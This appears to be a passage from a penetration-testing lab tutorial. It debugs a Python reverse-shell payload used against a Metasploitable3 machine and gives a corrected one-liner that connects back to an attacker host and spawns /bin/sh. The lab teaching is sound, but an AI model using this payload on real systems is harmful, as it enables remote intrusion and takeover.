In the previous section, we saw how we could use an exploit with different payloads to take advantage of a particular vulnerability that granted us remote access to the Metasploitable3 Ubuntu machine.

However, during the course of the previous exercise, the second payload we introduced, which we obtained from the internet, failed to establish a reverse connection to our Kali Linux attacker machine.

Take a few minutes to review the code of the new payload and try to identify the issue.

python_payload = f'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(({local_ip},{local_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"'

Indeed! The previous payload contains some syntax errors that cause conflicts between double quotes (") and single quotes ('). Additionally, the single quotes are missing around the target machine's IP address.

This is the code we should use for it to execute correctly.

Try replacing it in the exploit and launching it against the Metasploitable3 machine!

python_payload = f'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'{local_ip}\',{local_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"'